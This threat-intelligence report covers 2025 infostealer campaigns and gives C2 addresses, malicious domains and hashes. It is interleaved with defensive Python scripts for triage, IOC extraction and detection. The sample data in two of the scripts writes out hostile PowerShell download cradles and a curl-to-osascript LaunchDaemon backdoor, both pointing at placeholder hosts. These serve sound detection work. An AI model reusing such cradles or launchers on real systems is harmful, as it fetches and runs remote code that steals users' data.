
Executive Summary

This report offers a comprehensive analysis of emerging infostealer malware campaigns and threat actor activity observed in 2025, with a particular focus on tactics, delivery vectors, and global impact. The cyber threat landscape has evolved rapidly, driven by increasingly sophisticated distribution mechanisms, supply-chain compromises, and the abuse of legitimate tools and infrastructure.

Key campaigns investigated include the Crazy Evil Campaign, which aggressively targets cryptocurrency users with layered malware attacks, and the resurgence of PureLogs and MaksStealer, both of which demonstrate enhanced evasion and payload encryption techniques. A new Go-based strain, “Debian Stealer,” has also emerged, focusing on geolocation tracking and system reconnaissance.

One alarming trend is the abuse of trusted platforms like GitHub, Telegram, and official software distribution sites to deliver malware payloads, as seen in the Braodo, AMOS, and Endgame Gear attacks. The Steam supply-chain compromise of the game Chemia, embedding Vidar and Fickle Stealers, highlights the real-world risks of software distribution hijacking.

Furthermore, Shellter Elite, a legitimate red-teaming tool, has been abused to covertly distribute payloads such as Rhadamanthys and SectopRAT, raising concern about commercial evasion frameworks being weaponized by threat actors. In parallel, AMOS has evolved into a full-fledged backdoor, now capable of persistent access and remote execution, marking a significant escalation in macOS-targeted threats.

In geopolitical contexts, the GIFTEDCROOK campaign has specifically targeted Ukrainian institutions using PDF lures that lead to macro-enabled Excel workbooks, revealing continued use of phishing and document-based lures in cyberespionage.

Perhaps the most alarming statistic comes from Flashpoint, which reported an 800% rise in credential theft linked to infostealers, amounting to an estimated 1.8 billion stolen credentials in the first half of the year alone. This explosion reflects both the scalability of these tools and their growing popularity in the cybercriminal underground.

Real-World Infostealer Campaigns Observed in July

Crazy Evil Campaign Targets Crypto Users with Sophisticated Malware Scams

A Russian-speaking cybercrime gang known as Crazy Evil has launched a widespread social media scam campaign primarily targeting cryptocurrency users. Active since at least 2021, the group has been linked to malware such as StealC, Atomic macOS Stealer (AMOS), and Angel Drainer, affecting both Windows and macOS platforms. Operating through a network of sub-groups and fake crypto platforms like Voxium and TyperDex, Crazy Evil uses phishing sites and malicious redirects to steal identities and digital assets.

Their structure includes multiple affiliate teams that drive targeted traffic to these fraudulent sites using advanced lead generation techniques. Crazy Evil maintains an active presence on Telegram, operating private channels such as “Payments”, “Logbar”, “Info”, and “Global Chat” that support affiliate coordination, payout tracking, technical guides, and general communication. The operator behind the group is known on Telegram as @AbrahamCrazyEvil, and its public channel is @CrazyEvilCorp.

In July, the group used the domain rivatalk[.]com to distribute a malicious downloader for both Windows 10+ and macOS 10.15+. Victims were instructed to enter a meeting code in order to download what appeared to be a desktop meeting app. This activity matches the group’s established campaign structure and is linked to the GrassCall/VibeCall scams documented in earlier months.

PureLogs Stealer Abuses Legitimate Sites to Deliver Encrypted Malware Payloads

In July, a surge of PureLogs Stealer infections was observed leveraging a legitimate Swedish real estate website (vastkupan[.]com) to host and distribute malicious payloads disguised as PDF files. These campaigns typically began with droppers, often packed with PureCrypter, that retrieved files such as Daupinslenj.pdf or Cxqyoub.dat. These were not PDFs at all but XOR-obfuscated .NET DLLs. Once downloaded, the DLL was decrypted in memory and injected into legitimate .NET utilities such as InstallUtil.exe or RegAsm.exe, evading file-based detection.

Network analysis revealed that infected systems connected to command-and-control (C2) servers such as 91[.]92[.]120[.]101:65535 and 65[.]108[.]24[.]103:62050. The compromised web server also had directory listing enabled, exposing the staged files that led directly to PureLogs deployment.
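The loader files in this campaign carry a .pdf name but no PDF structure, and the DLL inside is hidden only by XOR. A quick triage check for that pattern, as an added example that is not part of the report or the malware's own code: it verifies the %PDF- magic and, when it is missing, brute-forces a single-byte XOR key that reveals an MZ header with a valid PE signature at e_lfanew. The single-byte key is an assumption (the report says only "XOR-obfuscated"), and the sample bytes below are constructed, not the real Daupinslenj.pdf.

```python
import struct
from typing import Dict, Optional

PDF_MAGIC = b"%PDF-"
DOS_STUB = b"This program cannot be run in DOS mode"


def looks_like_pdf(data: bytes) -> bool:
    """A genuine PDF carries %PDF- within the first kilobyte (the spec allows a short junk prefix)."""
    return PDF_MAGIC in data[:1024]


def xor_bytes(data: bytes, key: int) -> bytes:
    return bytes(b ^ key for b in data)


def find_xor_key(data: bytes) -> Optional[int]:
    """Brute-force a single-byte XOR key that reveals a PE image.

    Only the DOS header (0x40 bytes) and the 4-byte PE signature at e_lfanew are
    decoded per candidate key, so the scan is cheap even for large files.
    Returns 0 for an unobfuscated PE, None if no key works.
    """
    if len(data) < 0x40:
        return None
    for key in range(256):
        hdr = xor_bytes(data[:0x40], key)
        if hdr[:2] != b"MZ":
            continue
        e_lfanew = struct.unpack_from("<I", hdr, 0x3C)[0]
        if e_lfanew + 4 <= len(data) and xor_bytes(data[e_lfanew:e_lfanew + 4], key) == b"PE\0\0":
            return key
    return None


def triage(name: str, data: bytes) -> Dict[str, object]:
    """Flag a file that is served as a PDF but hides a (XOR-wrapped) PE image."""
    result: Dict[str, object] = {
        "name": name, "pdf_magic": looks_like_pdf(data),
        "xor_key": None, "hidden_pe": False, "dos_stub": False,
    }
    if not result["pdf_magic"]:
        key = find_xor_key(data)
        result["xor_key"] = key
        result["hidden_pe"] = key is not None
        if key is not None:
            # second, independent confirmation: the DOS stub text decodes with the same key
            result["dos_stub"] = DOS_STUB in xor_bytes(data[:0x200], key)
    return result


def build_sample_pe() -> bytes:
    """Constructed stand-in for a .NET DLL header: MZ, e_lfanew -> PE\\0\\0, DOS stub text at 0x4E."""
    hdr = bytearray(0x80)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)
    hdr[0x4E:0x4E + len(DOS_STUB)] = DOS_STUB
    return bytes(hdr) + b"PE\0\0" + b"\0" * 0x60


# Constructed inputs: the file name comes from the report, the bytes do not.
SAMPLES = {
    "Daupinslenj.pdf": xor_bytes(build_sample_pe(), 0x5A),   # loader DLL disguised as a PDF
    "invoice.pdf": b"%PDF-1.7\n1 0 obj\n<< /Type /Catalog >>\nendobj\n%%EOF\n",
}

if __name__ == "__main__":
    for fname, blob in SAMPLES.items():
        print(triage(fname, blob))
```

Multi-byte or rolling XOR keys will not be recovered by this scan; for those, the absence of PDF magic on a file that a process downloaded as "*.pdf" is already enough to pull the sample for manual analysis.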

MaksStealer Campaign Resurfaces with New Java-Based Samples

In early July, renewed activity was observed involving the MaksStealer malware family, a Java-based infostealer that continues to circulate through obfuscated .jar payloads. Recent samples were seen communicating with malicious domains such as zium[.]xyz and rext[.]xyz, both flagged for involvement in malware delivery and data exfiltration.

Additional MaksStealer files were also seen on MalwareBazaar, reinforcing that the malware is actively spreading across multiple channels. These sightings confirm the stealer’s continued evolution and presence in the threat landscape despite limited mainstream reporting.

The reported samples include multiple obfuscated .jar payloads, such as OutBuilder33.jar, dupl32.jar, and server_crasher_4.jar, among others. Each sample is tied to Java-based stealer behavior targeting sensitive user data such as credentials, browser sessions, and system metadata. The campaign is consistent with previously observed tactics but demonstrates expansion through multiple loaders and downloader components.

New Go-Based “Debian Stealer” Targets System and Geolocation Data

A new infostealer malware written in Golang and referred to as Debian Stealer was observed circulating recently.

The stealer performs a wide range of system reconnaissance tasks, including:

  • Collecting system information (getSystemInfo, getWindowsInfo, getHardwareInfo)
  • Grabbing geolocation and public IP address
  • Scanning for Discord backup codes and common directories/files
  • Capturing screenshots
  • Extracting software and network-related content

Additionally, the malware structures the exfiltrated data for easy visibility, formatting it for display with clear labels (username, IP address, system uptime, etc.), and includes links to Google Maps to pinpoint the victim’s exact location using IP-based geodata.

Although still limited in visibility, this malware highlights continued interest among threat actors in using Golang for infostealers—likely due to its cross-compilation capabilities and lower detection rates compared to traditional malware families.

Braodo Stealer Spotted Using GitHub for Payload Delivery

A new campaign involving the Braodo Stealer was observed in July, leveraging batch scripts and GitHub-hosted files for infection. The initial dropper, a BAT file named “List of quantity of tape.bat” (MD5: b8fdca1d1d13f20718cc786161d53b31), served as the entry point in the infection chain. Upon execution, the script connects to a GitHub repository at https://github[.]com/LABUBU99999/Localoco8386.

From there, it downloads an additional BAT file and a ZIP archive containing components of the stealer. Using GitHub as the distribution platform helps the attackers bypass traditional detection mechanisms by exploiting trust in legitimate infrastructure.

This method reflects a growing trend in the infostealer ecosystem, where commodity malware families like Braodo are adopting low-footprint, script-based loaders and open-source hosting platforms to improve evasion and scalability. Braodo itself is known for harvesting browser credentials, session data, and system information, making it a persistent threat in the info-stealing space.

BOFAMET: Python-Based InfoStealer Leveraging Custom C2 Servers

A newly identified Python-based infostealer named BOFAMET has been observed in the wild, featuring a modular design for data collection and exfiltration. It includes a dedicated data-harvesting module along with built-in communication with attacker-controlled command-and-control (C2) servers.

The stealer is designed to extract sensitive system and user data, potentially including credentials, session tokens, system metadata, and application-specific information, and transmit it to the following C2 endpoints:

  • 83[.]217[.]209[.]205:8000
  • 185[.]244[.]50[.]145:8080

The use of Python allows BOFAMET to remain lightweight and flexible, while the C2 infrastructure points to active remote management and data collection. Though not yet widely documented, its emergence signals continued diversification in the infostealer ecosystem, with Python-based threats becoming increasingly common due to ease of development and portability.
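Indicators throughout this report are defanged (91[.]92[.]120[.]101, soft-gets[.]com), and extraction sometimes mangles them further, as in the half-bracketed "205[:8000" form of the BOFAMET addresses. Before any of these go into a blocklist they need to be refanged and validated. The script below is an added example, not tooling from the report: it normalizes the common defanging conventions, pulls IPv4:port pairs, domains, MD5 and SHA256 hashes out of free text, and drops file names (tape.bat, Synaptics.exe) that a naive domain regex would otherwise swallow. The sample text is a constructed excerpt assembled from indicators in this report.

```python
import ipaddress
import re
from typing import Dict, Iterable, List

# Common defanging conventions used in threat reports
DEFANG_MAP = {"[.]": ".", "(.)": ".", "[dot]": ".", "hxxps://": "https://", "hxxp://": "http://", "[:]": ":"}
# Labels that look like TLDs but are file extensions in this kind of text
FILE_EXTENSIONS = {"exe", "dll", "pdf", "dat", "bat", "zip", "jar", "xls", "xlsb", "doc", "rar", "pif", "scpt"}

IPV4_PORT_RE = re.compile(r"\b(\d{1,3}(?:\.\d{1,3}){3})(?::(\d{1,5}))?\b")
DOMAIN_RE = re.compile(r"\b((?:[a-z0-9-]+\.)+([a-z]{2,}))\b", re.I)
SHA256_RE = re.compile(r"\b[a-f0-9]{64}\b", re.I)
MD5_RE = re.compile(r"\b[a-f0-9]{32}\b", re.I)


def refang(text: str) -> str:
    """Undo defanging; also repair the half-bracketed port separator ('205[:8000') seen in extractions."""
    for needle, repl in DEFANG_MAP.items():
        text = text.replace(needle, repl)
    return re.sub(r"\[:(?=\d)", ":", text)


def _dedupe(items: Iterable[str]) -> List[str]:
    seen, out = set(), []
    for item in items:
        if item not in seen:
            seen.add(item)
            out.append(item)
    return out


def extract_iocs(text: str) -> Dict[str, List[str]]:
    clean = refang(text)
    ips, domains = [], []
    for ip, port in IPV4_PORT_RE.findall(clean):
        try:
            addr = ipaddress.IPv4Address(ip)          # rejects 999.1.1.1 style junk
        except ValueError:
            continue
        if addr.is_private or addr.is_loopback:       # RFC1918 / lab noise is not an indicator
            continue
        if port and not 1 <= int(port) <= 65535:
            continue
        ips.append(f"{ip}:{port}" if port else ip)
    for name, tld in DOMAIN_RE.findall(clean):
        if tld.lower() not in FILE_EXTENSIONS:
            domains.append(name.lower())
    return {
        "ipv4": _dedupe(ips),
        "domain": _dedupe(domains),
        "md5": _dedupe(h.lower() for h in MD5_RE.findall(clean)),
        "sha256": _dedupe(h.lower() for h in SHA256_RE.findall(clean)),
    }


# Constructed excerpt built from indicators quoted in this report
SAMPLE = """
PureLogs C2: 91[.]92[.]120[.]101:65535 and 65[.]108[.]24[.]103:62050, loader hosted on vastkupan[.]com
BOFAMET C2: 83[.]217.209.205[:8000 and 185[.]244.50.145[:8080
Braodo dropper List of quantity of tape.bat (MD5: b8fdca1d1d13f20718cc786161d53b31)
PureLogs XLS SHA256: 42c4e855a966f8383f09e52eed215c3b8137025dfda6e8afb3c80410e32d3a67
Chemia worker.ps1 fetches from soft-gets[.]com; XRed drops Synaptics.exe
"""

if __name__ == "__main__":
    for kind, values in extract_iocs(SAMPLE).items():
        print(kind, values)
```

The domain pattern is deliberately loose; in production, check the extracted label against a public-suffix list rather than a hand-maintained extension set.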

FormBook Stealer Distributed via Malicious Email Attachment in Italian-Language Campaign

A phishing campaign targeting Italian-speaking users was observed in early July, delivering the FormBook infostealer via a malicious .pif file attachment. The email, appearing to originate from Katharina George ([email protected]), is titled "Ordinazione d'acquisto" (Purchase Order) and contains a short message referencing an attached order document.

The attached file, “Ordinazione d'acquisto.pif”, is a disguised executable designed to install FormBook, a well-known infostealer that exfiltrates credentials, session data, keystrokes, and clipboard contents.

The message body is written in formal Italian, likely to improve credibility and evade suspicion:

"Le allego una copia dell'ordine d'acquisto. Resto in attesa di una sua risposta."

("Attached is a copy of the purchase order. I await your reply.")

Image source : https://cert-agid.gov.it/

A second, more elaborate FormBook campaign was uncovered targeting Italian companies, particularly those involved in tenders, energy projects, and strategic commercial initiatives. Although Microsoft now blocks macros by default in Office files that carry the Mark of the Web, attackers continue to rely on malicious Office macros, counting on outdated systems and user oversight.

This campaign, analyzed by CERT-AGID, uses a multi-stage approach:

  1. Initial email impersonates a known energy company, claiming to share project-related documents.
  2. A PDF attachment features the company’s logo and contains two links leading to password-protected ZIP files hosted on file-sharing platforms.
  3. The extracted ZIP includes Office documents (DOC, XLSB), some benign, others laced with macro-enabled scripts.
  4. When executed, these macros fetch and install FormBook, an infostealer capable of:
    • Logging keystrokes
    • Taking screenshots
    • Harvesting browser credentials
    • Extracting data from web forms
    • Downloading secondary payloads

The infrastructure behind the attack leverages recently registered lookalike domains and compromised Italian domains belonging to legitimate companies in similar sectors. This campaign highlights the continued use of social engineering and language localization in delivering commodity malware through phishing, with FormBook still actively maintained and frequently observed in global spam waves.

New AMOS Stealer Distribution Domains Mimic Homebrew Project

A newly identified set of distribution domains for the AMOS (Atomic macOS Stealer) was spotted in July, continuing the trend of abusing popular developer tools and branding. This wave leverages the theme of “Homebrew”, a well-known macOS package manager, to lure users into downloading the stealer.

The domains identified include:

  • brrewsh[.]org
  • raw.brrewsh[.]org

These domains mimic the naming of legitimate Homebrew infrastructure (the project’s official site is brew.sh), likely in an attempt to trick users, especially developers and tech-savvy individuals, into executing malicious payloads disguised as setup or update scripts.

AMOS targets macOS systems, stealing browser-stored credentials, crypto wallets, keychain data, and system information. This new vector demonstrates the increasing sophistication of social engineering in AMOS campaigns and the consistent use of lookalike domains to improve distribution success.

PureLogs Stealer Delivered via Invoice-Themed Excel Attachment

In mid-July, a phishing campaign impersonating Leister Technologies Italia S.r.l. was observed delivering the PureLogs infostealer through a malicious Excel attachment. The email, written in Italian, claims to share an invoice titled “Fattura I500-1413-2025” and is sent from [email protected], a spoofed or compromised sender address.

The attached file:

  • Filename: Leister Technologies Italia S.r.l. - Fattura I500-1413-2025.xls
  • SHA256: 42c4e855a966f8383f09e52eed215c3b8137025dfda6e8afb3c80410e32d3a67
  • File size: ~314 KB

Upon opening the file, macros or embedded scripts initiate a process that ultimately downloads and executes the PureLogs stealer, a malware family known for stealing browser credentials, crypto wallets, and system data. The campaign’s C2 infrastructure is tied to the server 104[.]243[.]32[.]185:22109. This case highlights how invoice-themed lures remain a reliable social engineering vector for malware distribution, especially among business users who routinely handle financial documents.

Lumma Stealer Evolves: New Tactics and Infrastructure Uncovered

Image source : www.trendmicro.com

After a major law enforcement takedown in May 2025 that disrupted its infrastructure and seized thousands of domains, Lumma Stealer has made a rapid and quiet comeback. According to Trend Micro, Lumma’s operators resumed operations by mid-July, using stealthier delivery tactics, new infrastructure, and a shift away from public underground forums.

The malware, known for stealing sensitive data such as credentials, system info, and browser-stored passwords, is once again being deployed across the globe — this time, with better evasion techniques and more secure command-and-control (C2) channels.

Lumma Stealer’s resurgence is fueled by evolving distribution strategies designed to evade detection and exploit user trust:

  • Pirated Software Lures

    Victims searching for cracked tools are led through malvertising and manipulated search results to download Lumma as password-protected ZIP files, after being filtered through a Traffic Distribution System (TDS) that screens out researchers and sandboxes.

  • Fake CAPTCHA Prompts That Execute PowerShell

    Fake CAPTCHA prompts on compromised sites trick users into pasting and running a PowerShell command themselves (the ClickFix technique), which decrypts and executes Lumma entirely in memory, evading file-based defenses.

  • Malware-Loaded GitHub Repositories

    Threat actors create fake GitHub accounts with auto-generated README files, offering fake cheats or tools while embedding Lumma malware in executables like TempSpoofer.exe.

  • Social Media Lure Campaigns

    Platforms like YouTube and Facebook are exploited to share fake tutorials or cracked software links, redirecting users to legitimate-looking sites hosting Lumma payloads.
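The fake-CAPTCHA chain above ends with the victim pasting a PowerShell one-liner into the Run dialog, and the same kind of download cradle shows up elsewhere in this report (the worker.ps1 stage in the Chemia chain, the Braodo batch loader calling PowerShell). A detection heuristic over process-creation telemetry, as an added example that is not from the report or Trend Micro: it scores each powershell.exe launch on the presence of a download cradle, in-memory execution, hidden window, policy bypass and an -EncodedCommand (which it decodes and re-scans), and adds weight when the parent is explorer.exe or a browser, as it is when a user runs a pasted command. The event records, URLs and weights are constructed for illustration; tune the threshold against your own baseline.

```python
import base64
import json
import re
from typing import Dict, List, Tuple

# (pattern, weight, label) applied to the command line plus any decoded -EncodedCommand payload
INDICATORS: List[Tuple[re.Pattern, int, str]] = [
    (re.compile(r"\biex\b|invoke-expression", re.I), 3, "in-memory execution (IEX)"),
    (re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|invoke-restmethod|\birm\b", re.I), 3, "download cradle"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I), 2, "hidden window"),
    (re.compile(r"-e(?:p|xecutionpolicy)\s+bypass", re.I), 1, "execution policy bypass"),
    (re.compile(r"-nop\b|-noprofile", re.I), 1, "no profile"),
    (re.compile(r"frombase64string", re.I), 2, "inline base64 payload"),
]
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
USER_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
ALERT_THRESHOLD = 5


def decode_encoded_command(cmdline: str) -> str:
    """-EncodedCommand carries base64 of UTF-16LE script text; return it decoded, or '' if absent."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le", errors="ignore")
    except ValueError:
        return ""


def score_event(ev: Dict[str, object]) -> Tuple[int, List[str]]:
    image = str(ev.get("Image", "")).rsplit("\\", 1)[-1].lower()
    parent = str(ev.get("ParentImage", "")).rsplit("\\", 1)[-1].lower()
    cmd = str(ev.get("CommandLine", ""))
    if image not in {"powershell.exe", "pwsh.exe"}:
        return 0, []
    score, reasons = 0, []
    decoded = decode_encoded_command(cmd)
    if decoded:
        score += 2
        reasons.append("encoded command")
    haystack = cmd + "\n" + decoded          # each indicator counts once, wherever it appears
    for pat, weight, label in INDICATORS:
        if pat.search(haystack):
            score += weight
            reasons.append(label)
    if parent in USER_PARENTS:
        score += 2
        reasons.append(f"spawned by {parent} (Run dialog / browser)")
    return score, reasons


def triage(lines: List[str]) -> List[Dict[str, object]]:
    """Take JSON process-creation records (Sysmon EID 1 style) and return those over the threshold."""
    alerts = []
    for line in lines:
        ev = json.loads(line)
        score, reasons = score_event(ev)
        if score >= ALERT_THRESHOLD:
            alerts.append({"pid": ev.get("ProcessId"), "score": score, "reasons": reasons})
    return alerts


def _enc(ps: str) -> str:
    return base64.b64encode(ps.encode("utf-16-le")).decode()


PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed records, not real telemetry; the .invalid hosts are placeholders
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"ProcessId": 4100, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\backup.ps1"},
    {"ProcessId": 4212, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe -w hidden -ep bypass -c \"iex (iwr 'https://captcha.invalid/verify.txt' -UseBasicParsing)\""},
    {"ProcessId": 4388, "Image": PS, "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -nop -w hidden -enc "
                    + _enc("IEX (New-Object Net.WebClient).DownloadString('http://soft-gets.invalid/worker.ps1')")},
    {"ProcessId": 900, "Image": r"C:\Program Files\Steam\steam.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "steam.exe -silent"},
]
SAMPLE_LOG = [json.dumps(e) for e in SAMPLE_EVENTS]

if __name__ == "__main__":
    for alert in triage(SAMPLE_LOG):
        print(alert)
```

The admin's scheduled script scores 3 (NoProfile plus the explorer parent) and stays below the threshold, while both cradle variants clear it by a wide margin; the decoded -enc payload is what lifts the third event, which is why re-scanning decoded content matters.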

Steam Supply‑Chain Attack: Vidar & Fickle Stealer Embedded in Chemia Game by EncryptHub

Image source : www.bleepingcomputer.com

In a startling discovery, cybersecurity firm Prodaft revealed that the Steam Early Access title "Chemia" was secretly bundled with three strains of malware — Fickle Stealer, Vidar Stealer, and HijackLoader. These malicious payloads were designed to steal sensitive data including cryptocurrency wallets, browser credentials, and more. Notably, HijackLoader acts as a launcher to deploy additional malware later.

Published by a shadowy entity known as Aether Forge Studios, the game was available via Steam's playtest request system, adding a false sense of trust. Prodaft attributes this campaign to the EncryptHub group, which has conducted targeted phishing and malware attacks since mid-2024.

Malware Execution Chain in "Chemia" Game Installer

During the supply chain attack involving the Chemia game, a well-structured multi-stage malware delivery chain was observed:

  • Stage 1: HijackLoader (CVKRUTNP.exe) was embedded inside the game bundle to establish persistence.
  • Stage 2: HijackLoader connects to a Telegram-based C2 server to fetch additional payloads.
  • Stage 3 (~3 hours later): A malicious DLL (cclib.dll) containing Fickle Stealer is added to the system.
  • Stage 4: A PowerShell script (worker.ps1) is executed to download the main payload from soft-gets[.]com.

Endgame Gear Config Tool Trojanized with XRed Malware

A Reddit user reported that the OP1w 4K V2 Configuration Tool downloaded from Endgame Gear’s official website was infected with the XRed malware, indicating a serious supply-chain compromise.

The user downloaded the installer directly from the vendor’s legitimate download page and observed suspicious behavior upon execution. After submitting the file to a sandbox for analysis, the user confirmed that the tool was trojanized with XRed malware — a remote access trojan (RAT) known for its data exfiltration and propagation capabilities.

The original Reddit poster who uncovered the malware went on to share steps for others to check whether they might also be affected. According to them, the trojanized file placed a suspicious executable named Synaptics.exe inside the hidden folder C:\ProgramData\Synaptics\.

If this Synaptics.exe file is present in that location, it's a strong sign of infection. The poster further explained that the malware sets itself to run automatically on startup and disguises itself under the guise of a legitimate driver. When checking the file properties, the description misleadingly shows up as “Synaptics Pointing Device Driver,” making it harder to detect at a glance.

Shellter Elite Abuse Enables Infostealer Distribution

The widely used red-teaming tool Shellter Elite was leaked and weaponized by cybercriminals starting in late April 2025. Researchers at Elastic Security Labs uncovered several campaigns using Shellter v11.0 to evade antivirus and EDR detection while deploying Lumma Stealer, Rhadamanthys, and the SectopRAT remote access trojan.

Although Shellter is built for authorized security assessments and penetration tests, threat actors leveraged its runtime and static evasion features, normally used in sanctioned engagements, to conceal malware inside legitimate binaries.

These campaigns took advantage of Shellter’s ability to inject polymorphic shellcode into clean executables, making the malware nearly invisible to signature-based tools. By encrypting payloads with AES, preloading key DLLs, and bypassing AMSI and user-mode API hooking, the attackers kept their malicious code undetected.

The malware was spread through phishing emails, cracked software downloads, and even YouTube videos offering fake tools and game mods. Victims would unknowingly execute a Shellter-wrapped loader that silently unpacked infostealers into memory — without writing anything suspicious to disk.

ARECHCLIENT2 (SectopRAT) Delivered via Shellter-Backdoored Sponsorship Lures

Image source : www.elastic.co

Around May 2025, a wave of phishing campaigns began targeting YouTube content creators. These attacks came disguised as sponsorship proposals from well-known brands like Udemy, Duolingo, and Skillshare. The goal was to trick creators into downloading malicious .rar archives posing as promotional kits.

Inside these archives was a backdoored executable wrapped using the Shellter Elite framework — a red-teaming tool repurposed by attackers to avoid detection. Thanks to Shellter’s obfuscation techniques, including polymorphic code and digital signature misuse, the malware remained largely invisible to antivirus tools.

Once launched, the hidden payload deployed ARECHCLIENT2, also known as SectopRAT — a Remote Access Trojan capable of both spying and data theft. It established contact with a remote command server, giving attackers full access to compromised machines and sensitive user information.

Rhadamanthys Delivered Through YouTube Comments and File-Sharing Platforms

Image source : www.elastic.co

Another Shellter-powered campaign used Rhadamanthys Stealer, targeting users interested in gaming cheats and mods. Malicious YouTube videos often themed around game hacks included download links in the comment section leading to files hosted on platforms like MediaFire.

These files, shared by multiple users and submitted over 100 times, contained payloads similar in structure to previous Shellter-based malware. Upon execution, Rhadamanthys activated and began stealing credentials, browser data, and system information, all while evading static detection.

Atomic macOS Stealer (AMOS): Now a Full-Fledged Backdoor Threat

The Atomic macOS Stealer (AMOS), already one of the most active threats targeting Apple users, has taken a serious leap in capability. According to Moonlock, a new variant of AMOS now includes a stealthy, persistent backdoor that gives attackers extended, long-term access to infected systems.

Previously used to steal passwords, browser data, and crypto wallets, AMOS now enables remote command execution, surveillance, and re-infection even after a system reboot.

This persistence is achieved by installing a LaunchDaemon, granting the malware long-term control. It uses AppleScript to execute commands, escalates privileges with the password stolen from the user during the initial infection, and silently sets up a communication channel with attacker-controlled servers.

The backdoor assigns a unique ID to each victim, enabling targeted remote commands. It also checks whether the device is running in a virtual machine or sandbox, helping the malware avoid analysis. Once active, the malware contacts its command-and-control (C2) server every 60 seconds to receive instructions such as:

  • Run shell commands
  • Remain idle
  • Delete all traces and exit

Image source : https://moonlock.com/

The updated AMOS stealer is distributed in two main ways: bundled inside fake or cracked software, and through spear-phishing emails, notably ones that pretend to offer job interviews to artists and freelancers.
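The persistence mechanism described above (a LaunchDaemon that runs AppleScript and polls C2 every 60 seconds) leaves a plist on disk, which is the artifact a responder can hunt. The script below is an added example, not Moonlock's analysis or AMOS code: it parses launchd property lists and flags items whose program line invokes osascript, an inline shell with a curl fetch or base64 decode, or something under a world-writable path, and whose StartInterval is short enough to be a beacon. The two plists are constructed; the update.invalid host and the com.finder.helper label are made up for the example.

```python
import glob
import os
import plistlib
import re
from typing import Dict, List
from xml.parsers.expat import ExpatError

SUSPICIOUS = [
    (re.compile(r"\bosascript\b"), "runs AppleScript"),
    (re.compile(r"\b(?:sh|bash|zsh)\b.*\s-c\s"), "inline shell command"),
    (re.compile(r"\bcurl\b"), "network fetch in launcher"),
    (re.compile(r"base64\s+(?:-d|-D|--decode)"), "base64-decoded payload"),
    (re.compile(r"/(?:tmp|private/tmp|var/tmp|Users/Shared)/"), "program under a world-writable path"),
]
BEACON_INTERVAL_MAX = 120   # seconds; the AMOS backdoor polls every 60 s per the write-up


def analyze_plist(raw: bytes, source: str = "<memory>") -> Dict[str, object]:
    """Score one launchd plist (XML or binary); two or more findings mark it suspicious."""
    p = plistlib.loads(raw)
    args = p.get("ProgramArguments") or [p.get("Program", "")]
    cmd = " ".join(str(a) for a in args)
    reasons = [why for pat, why in SUSPICIOUS if pat.search(cmd)]
    interval = p.get("StartInterval")
    if isinstance(interval, int) and 0 < interval <= BEACON_INTERVAL_MAX:
        reasons.append(f"short StartInterval ({interval}s), beacon-like")
    if p.get("RunAtLoad") and p.get("KeepAlive"):
        reasons.append("RunAtLoad + KeepAlive")
    return {"source": source, "label": p.get("Label", ""), "command": cmd,
            "reasons": reasons, "suspicious": len(reasons) >= 2}


def scan_launch_items(dirs=("/Library/LaunchDaemons", "/Library/LaunchAgents",
                            os.path.expanduser("~/Library/LaunchAgents"))) -> List[Dict[str, object]]:
    """Walk the standard launchd directories; missing directories (non-macOS hosts) are skipped."""
    findings = []
    for d in dirs:
        for path in glob.glob(os.path.join(d, "*.plist")):
            try:
                with open(path, "rb") as fh:
                    findings.append(analyze_plist(fh.read(), path))
            except (OSError, ValueError, ExpatError, plistlib.InvalidFileException):
                continue   # unreadable or malformed plist: note it, move on
    return [f for f in findings if f["suspicious"]]


# Constructed plists for the example
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.example.updater</string>
  <key>ProgramArguments</key><array>
    <string>/Library/Application Support/Example/updater</string><string>--check</string>
  </array>
  <key>StartInterval</key><integer>3600</integer>
  <key>RunAtLoad</key><true/>
</dict></plist>"""

BACKDOOR_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
  <key>Label</key><string>com.finder.helper</string>
  <key>ProgramArguments</key><array>
    <string>/bin/sh</string><string>-c</string>
    <string>curl -fsSL https://update.invalid/t | base64 -d > /Users/Shared/.helper.scpt; osascript /Users/Shared/.helper.scpt</string>
  </array>
  <key>StartInterval</key><integer>60</integer>
  <key>RunAtLoad</key><true/>
  <key>KeepAlive</key><true/>
</dict></plist>"""

if __name__ == "__main__":
    for blob in (BENIGN_PLIST, BACKDOOR_PLIST):
        print(analyze_plist(blob))
    for hit in scan_launch_items():
        print("live finding:", hit["source"], hit["reasons"])
```

Run it with sudo on a suspect Mac so /Library/LaunchDaemons is readable; pair a hit with `launchctl list` output and the plist's owner and mtime before concluding anything, since legitimate agents also use RunAtLoad and KeepAlive.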

GIFTEDCROOK Campaign Targets Ukrainian Institutions via PDF Lures and Macro-Enabled Excel Workbooks

A new espionage-focused campaign, known as GIFTEDCROOK, has emerged as a significant threat to Ukrainian military and government audiences. The malware, attributed to the group UAC‑0226, began as a simple browser credential stealer but rapidly evolved into a more powerful intelligence collector by mid‑2025.

Image source : https://arcticwolf.com/

The campaign relies on spear-phishing emails carrying PDF documents styled around military service or administrative updates. When opened, these PDFs direct victims to the file-sharing site Mega.nz to download an Excel workbook that requires enabling macros. Once macros were enabled, the chain moved quickly:

  • The Excel file quietly extracted malicious code into hidden folders on the system, like Infomaster or PhoneInfo.
  • It then collected browser data, documents, and VPN configs, focusing on files modified within the last 15 to 45 days.
  • This data was packaged into a zip file, encrypted using XOR, and sent directly to the attackers through Telegram bots, using Telegram’s own APIs.
